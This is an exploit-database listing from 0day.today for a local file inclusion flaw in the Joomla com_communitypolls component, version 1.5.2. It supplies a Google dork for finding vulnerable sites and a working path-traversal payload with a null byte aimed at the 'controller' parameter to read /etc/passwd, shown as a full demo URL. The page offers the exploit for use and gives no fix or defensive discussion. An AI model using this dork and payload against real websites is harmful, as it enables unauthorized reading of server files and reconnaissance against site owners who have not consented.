[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component com_communitypolls LFI Vulnerability

Author
kaMtiEz
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10989
Category
web applications
Date add
19-02-2010
Platform
unsorted
=====================================================
Joomla Component com_communitypolls LFI Vulnerability
=====================================================

[!]===========================================================================[!]
 
[ Software Information ]
 
[+] Vendor : http://www.corejoomla.com/
[+] Price : free
[+] Vulnerability : LFI
[+] Dork : inurl:"CIHUY" ;)
[+] Download : http://www.corejoomla.com/downloads/community-polls/24-comcommunitypollsv1-5-2.html
[+] Version : 1.5.2 maybe lower also affected
 
[!]===========================================================================[!]
 
[ Vulnerable File ]
 
http://127.0.0.1/index.php?option=com_communitypolls&controller=[INDONESIANCODER]
 
[ XpL ]
 
../../../../../../../../../../../../../../../etc/passwd%00
 
[ d3m0 ]
 
http://server/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00
 
 
etc etc etc ;]
 
[!]===========================================================================[!]



#  0day.today [2024-12-23]  #